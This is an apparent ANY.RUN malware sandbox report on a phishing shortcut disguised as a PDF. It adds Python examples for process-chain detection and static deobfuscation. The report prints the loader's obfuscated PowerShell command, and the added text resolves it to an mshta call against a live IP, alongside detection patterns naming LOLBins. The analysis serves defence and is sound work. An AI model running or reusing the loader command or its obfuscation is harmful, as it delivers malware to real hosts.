File name:

CarrierAgreement.pdf.lnk

Full analysis: https://app.any.run/tasks/09bcabcf-0df4-4879-b0a3-a6f625447f14
Verdict: Malicious activity
Threats:

A loader is malware whose job is to deliver further payloads. It typically profiles the infected host and then installs other threats such as trojans or stealers. Loaders are usually delivered through phishing e-mails and links, relying on social engineering to get the user to download and run them, and use evasion and persistence techniques to avoid detection.

Analysis date: March 24, 2025, 21:33:20
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
installer
qrcode
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe" KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

0F2138ECCF152F982B8CCA16DEEED260

SHA1:

EF1F7AA1CD1850E986147630C6DB6AE65AF64BFA

SHA256:

54B45729C8A1A2303A8D883CB8A1B5BBADA0E5DB5DFF830EA2AA227A6FDF0663

SSDEEP:

24:8N84ZsxtBff1efVKayWtie/CWgOgfgtgrgfgza88gamgjgYgGugYgd+KgxjgxCg3:8GBX1e3ztoynYUZw+do9aQP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7496)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7604)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7604)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7604)
    • Executing a file with an untrusted certificate

      • Final.exe (PID: 7400)
    • Changes the autorun value in the registry

      • Final.exe (PID: 7400)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • mshta.exe (PID: 7496)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7496)
    • Executable content was dropped or overwritten

      • mshta.exe (PID: 7496)
      • powershell.exe (PID: 7604)
      • csc.exe (PID: 1128)
      • Final.exe (PID: 7400)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7496)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7496)
    • Executes script without checking the security policy

      • powershell.exe (PID: 7604)
    • Potential Corporate Privacy Violation

      • mshta.exe (PID: 7496)
    • Connects to the server without a host name

      • powershell.exe (PID: 7604)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7604)
    • Reads Microsoft Outlook installation path

      • OpenWith.exe (PID: 1164)
    • Reads the date of Windows installation

      • MSBuild.exe (PID: 6592)
    • Reads the Windows owner or organization settings

      • MSBuild.exe (PID: 6592)
  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 7496)
      • powershell.exe (PID: 7604)
      • slui.exe (PID: 4728)
    • The sample compiled with english language support

      • mshta.exe (PID: 7496)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7496)
      • OUTLOOK.EXE (PID: 7436)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7604)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7604)
    • Disables trace logs

      • powershell.exe (PID: 7604)
    • Application launched itself

      • Acrobat.exe (PID: 7772)
      • AcroCEF.exe (PID: 8000)
      • msedge.exe (PID: 7688)
    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 1164)
    • Reads Microsoft Office registry keys

      • Acrobat.exe (PID: 7772)
      • OpenWith.exe (PID: 1164)
    • The executable file from the user directory is run by the Powershell process

      • Final.exe (PID: 7400)
    • Checks supported languages

      • MSBuild.exe (PID: 6592)
      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • cvtres.exe (PID: 5964)
      • ielowutil.exe (PID: 2968)
      • identity_helper.exe (PID: 7724)
    • Reads the computer name

      • Final.exe (PID: 7400)
      • MSBuild.exe (PID: 6592)
      • ielowutil.exe (PID: 2968)
      • identity_helper.exe (PID: 7724)
    • Reads the machine GUID from the registry

      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • MSBuild.exe (PID: 6592)
    • Create files in a temporary directory

      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • cvtres.exe (PID: 5964)
    • Creates files or folders in the user directory

      • Final.exe (PID: 7400)
    • Reads CPU info

      • MSBuild.exe (PID: 6592)
    • Reads Windows Product ID

      • MSBuild.exe (PID: 6592)
    • Reads Environment values

      • MSBuild.exe (PID: 6592)
      • identity_helper.exe (PID: 7724)
    • Reads product name

      • MSBuild.exe (PID: 6592)
    • Process checks whether UAC notifications are on

      • OUTLOOK.EXE (PID: 7436)
    • Manual execution by a user

      • msedge.exe (PID: 7688)
    • Local mutex for internet shortcut management

      • iexplore.exe (PID: 7248)
    • Reads the software policy settings

      • slui.exe (PID: 4728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
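The signatures above describe one parent-child chain: the LNK's target powershell.exe runs mshta.exe against the dotted-quad host, that HTA spawns a second, hidden powershell.exe with an overridden execution policy, which downloads and runs Final.exe from a user directory, and Final.exe in turn launches csc.exe and MSBuild.exe. The following Python is an added example, not part of the ANY.RUN report, that checks Sysmon-style process-creation records (Event ID 1 field names) against rules for each link of that chain. The records are constructed for the example: PIDs, image names and the csc.exe/MSBuild.exe command lines mirror the process information in this report, while the other command lines, Final.exe's path under %TEMP% and the explorer.exe parent are assumptions. Note that a plain URL regex never fires on the first powershell.exe, because its command line is obfuscated; the obfuscation itself is what that record trips on, and the resolved URL only appears on the child mshta.exe.

```python
"""Process-tree check for the mshta -> PowerShell -> user-dir EXE -> MSBuild/csc chain.

Added example, not part of the ANY.RUN report. Field names follow Sysmon
Event ID 1 (ProcessId, Image, ParentImage, CommandLine); the events below are
constructed to mirror the chain in this analysis, not captured telemetry.
"""
import re
from typing import Dict, List

# Constructed records. Assumptions: explorer.exe as the first parent, Final.exe
# living under %TEMP%, and the wording of the powershell/mshta command lines.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ProcessId": "7316", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r". ([char]105+[char]101+[char]120)('m£s£h£££t£££a£ £££h£££t£££tp£:/££/£££9££1.£1£££0£££3£££.2£5£££3£££.££49£/££C£a£££r£££r£ier£££A£g£££r£eem£en££t' -replace '£')"},
    {"ProcessId": "7496", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://91.103.253.49/CarrierAgreement"},
    {"ProcessId": "7604", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Unrestricted -Command ..."},
    {"ProcessId": "7400", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\admin\AppData\Local\Temp\Final.exe",
     "CommandLine": r"C:\Users\admin\AppData\Local\Temp\Final.exe"},
    {"ProcessId": "1012", "ParentImage": r"C:\Users\admin\AppData\Local\Temp\Final.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'},
    {"ProcessId": "1128", "ParentImage": r"C:\Users\admin\AppData\Local\Temp\Final.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xwz152rb.cmdline"'},
    # Negative control: an ordinary Edge utility process (PID 744 in this report).
    {"ProcessId": "744", "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility'},
]

DOTTED_QUAD_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|\s|$)", re.IGNORECASE)
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)
HIDDEN_OR_BYPASS = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-(?:ep|exec|executionpolicy)\s+(?:bypass|unrestricted)|-nop(?:rofile)?\b",
    re.IGNORECASE)
# [char]N+[char]N arithmetic, or a -replace that deletes a single junk character.
OBFUSCATION = re.compile(r"\[char\]\s*\d+\s*\+|-replace\s*'.'\s*\)", re.IGNORECASE)
BUILD_TOOLS = {"msbuild.exe", "csc.exe", "vbc.exe"}
# Parents from which the .NET build tools are normally launched. Tune per estate:
# build agents that run MSBuild from cmd/powershell need their own allow-list.
EXPECTED_BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "csc.exe", "vbcscompiler.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the rule names an event trips (empty list for benign records)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    if image == "powershell.exe" and OBFUSCATION.search(cmd):
        hits.append("obfuscated powershell command line")
    if image == "mshta.exe" and DOTTED_QUAD_URL.search(cmd):
        hits.append("mshta fetching content from a dotted-quad host")
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("powershell spawned by mshta")
    if image == "powershell.exe" and HIDDEN_OR_BYPASS.search(cmd):
        hits.append("powershell hidden window / execution policy override")
    if parent == "powershell.exe" and image.endswith(".exe") and USER_WRITABLE.match(event["Image"]):
        hits.append("powershell launched an executable from a user-writable directory")
    if image in BUILD_TOOLS and parent not in EXPECTED_BUILD_PARENTS:
        hits.append(f"{image} spawned by unexpected parent {parent}")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map ProcessId -> tripped rules, for every event that tripped at least one."""
    result: Dict[str, List[str]] = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            result[ev["ProcessId"]] = hits
    return result


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(hits))
```

Each rule on its own is noisy (developers do launch csc.exe from scripts, and admins do run hidden PowerShell); the value is in the same host tripping several of them within seconds, so in a real pipeline these hits would be correlated per host and per process tree rather than alerted individually.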
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: . ([char]105+[char]101+[char]120)('m£s£h£££t£££a£ £££h£££t£££tp£:/££/£££9££1.£1£££0£££3£££.2£5£££3£££.££49£/££C£a£££r£££r£ier£££A£g£££r£eem£en££t' -replace '£')"
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
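The CommandLineArguments value above hides the real command behind two cheap tricks: the cmdlet name is assembled from [char] codes (105, 101, 120 spell "iex"), and the argument is a string padded with '£' characters that -replace strips at run time, so neither "mshta" nor the URL appears literally in the LNK. The following Python is an added example, not part of the ANY.RUN report, that resolves both layers statically, without executing anything, and extracts the URL; the sample input is the field as printed above. The result matches the first HTTP request in the network section.

```python
"""Static deobfuscation of the LNK's PowerShell command line.

Added example, not part of the ANY.RUN report. It undoes the two layers seen
in the CommandLineArguments field: [char]N+[char]N+... arithmetic (hides the
cmdlet name) and a junk-padded string cleaned by -replace (hides the URL).
Nothing is executed; the text is rewritten and indicators are pulled out.
"""
import re
from typing import List, Tuple

# Sample input: the CommandLineArguments value from the LNK section, copied
# as printed there (including the stray trailing double quote).
SAMPLE_ARGS = (
    ". ([char]105+[char]101+[char]120)"
    "('m£s£h£££t£££a£ £££h£££t£££tp£:/££/£££9££1.£1£££0£££3£££.2£5£££3£££.££49£/££"
    "C£a£££r£££r£ier£££A£g£££r£eem£en££t' -replace '£')\""
)

# ( [char]105 + [char]101 + [char]120 )  ->  the string those code points spell
CHAR_CONCAT = re.compile(r"\(\s*((?:\[char\]\s*\d+\s*\+\s*)*\[char\]\s*\d+)\s*\)", re.IGNORECASE)
CHAR_CODE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
# 'literal' -replace 'pattern' with no replacement operand: PowerShell deletes every match
REPLACE_DELETE = re.compile(r"'((?:[^']|'')*)'\s*-replace\s*'((?:[^']|'')*)'(?!\s*,)", re.IGNORECASE)


def resolve_char_concat(text: str) -> str:
    """Replace every ([char]N+[char]N+...) group with the string it builds."""
    return CHAR_CONCAT.sub(
        lambda m: "".join(chr(int(n)) for n in CHAR_CODE.findall(m.group(1))), text)


def resolve_replace_delete(text: str) -> str:
    """Apply 'str' -replace 'pat' with PowerShell semantics: regex, case-insensitive, delete matches."""
    def apply(m) -> str:
        literal = m.group(1).replace("''", "'")   # PowerShell single-quote escaping
        pattern = m.group(2).replace("''", "'")
        return "'" + re.sub(pattern, "", literal, flags=re.IGNORECASE) + "'"
    return REPLACE_DELETE.sub(apply, text)


def deobfuscate(cmdline: str) -> str:
    """Run both layers until the text stops changing, so nested uses also resolve."""
    prev = None
    while prev != cmdline:
        prev = cmdline
        cmdline = resolve_replace_delete(resolve_char_concat(cmdline))
    return cmdline


URL = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
LOLBINS = ("mshta", "iex", "invoke-expression", "regsvr32", "rundll32",
           "certutil", "bitsadmin", "curl", "wget")


def extract_indicators(cmdline: str) -> Tuple[str, List[str], List[str]]:
    """Return (deobfuscated command, URLs found, LOLBin/cmdlet names found)."""
    clean = deobfuscate(cmdline)
    urls = URL.findall(clean)
    lower = clean.lower()
    bins = [b for b in LOLBINS if re.search(r"\b" + re.escape(b) + r"\b", lower)]
    return clean, urls, bins


if __name__ == "__main__":
    clean, urls, bins = extract_indicators(SAMPLE_ARGS)
    print("Resolved :", clean)
    print("URLs     :", urls)
    print("LOLBins  :", bins)
```

For this sample the resolved command is `. iex('mshta http://91.103.253.49/CarrierAgreement')`, i.e. Invoke-Expression running mshta against the first URL in the HTTP requests list. The -replace operand is treated as a case-insensitive regex, as PowerShell treats it, so a pattern such as '[£]' or one containing metacharacters resolves the same way it would on the victim.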
No data.
All screenshots are available in the full report
Total processes
200
Monitored processes
71
Malicious processes
5
Suspicious processes
0

Behavior graph

Processes shown in the graph, in the order listed (entries the report marks "no specs" have no detail pane):
powershell.exe, conhost.exe, mshta.exe, powershell.exe, conhost.exe, acrobat.exe (x2), acrocef.exe (several), openwith.exe, acrocef.exe (several), final.exe, outlook.exe, csc.exe, conhost.exe, cvtres.exe, msbuild.exe (x2), acrocef.exe, outlook.exe, ai.exe, ielowutil.exe, iexplore.exe (x2), slui.exe, msedge.exe (many child processes), identity_helper.exe (x2), msedge.exe (many child processes)

Process information

PID
CMD
Path
Indicators
Parent process
PID:
744
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6772 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:8
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
812
CMD:
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2692 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2
Path:
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process:
AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID:
904
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6528 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:8
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
920
CMD:
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2580 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2
Path:
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process:
AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID:
1012
CMD:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Parent process:
Final.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID:
1128
CMD:
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xwz152rb.cmdline"
Path:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Parent process:
Final.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
PID:
1164
CMD:
C:\WINDOWS\system32\OpenWith.exe -Embedding
Path:
C:\Windows\System32\OpenWith.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID:
2316
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2408 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:2
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
2384
CMD:
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2840 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
Path:
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process:
AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID:
2968
CMD:
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
Path:
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Low-Mic Utility Tool
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\program files (x86)\internet explorer\ielowutil.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Total events
61 210
Read events
60 562
Write events
562
Delete events
86

Modification events

(PID) Process: (7496) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty)

(PID) Process: (7496) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (7496) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (7604) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation: write
Name: Acrobat.Document.DC
Value: (empty)

(PID) Process: (7772) Acrobat.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation: write
Name: DisplayName
Value: Adobe Acrobat Reader Protected Mode

(PID) Process: (7896) Acrobat.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation: write
Name: bLastExitNormal
Value: 0

(PID) Process: (7896) Acrobat.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation: write
Name: bSynchronizeOPL
Value: 0

(PID) Process: (7896) Acrobat.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation: write
Name: uLastAppLaunchTimeStamp
Value: (empty)

(PID) Process: (7896) Acrobat.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation: write
Name: iNumAcrobatLaunches
Value: 7

(PID) Process: (7896) Acrobat.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\NoTimeOut
Operation: write
Name: smailto
Value: 5900
Executable files
11
Suspicious files
535
Text files
92
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 7316 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_outssgbl.tpp.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7316 | Process: powershell.exe | Type: binary
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PXKFMN3XGZC6H4F6DZIJ.temp
MD5: E202BC7D45EC7F507C5368AC438CBEEB
SHA256: 4DB77DE698228E9654E0622A063EE589AAB952EB545510D3A8E6B877B25EAFCA

PID: 7316 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j1qrhgul.tqi.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 8000 | Process: AcroCEF.exe | Type: text
Filename: C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old
MD5: 8412AEEF2309E13FC954061D9BCEFFF4
SHA256: D062D7B5DF5F3BCB753E97AB5D1DCD9CF62058D9103DA383DBE1F482FC1D4644

PID: 7896 | Process: Acrobat.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
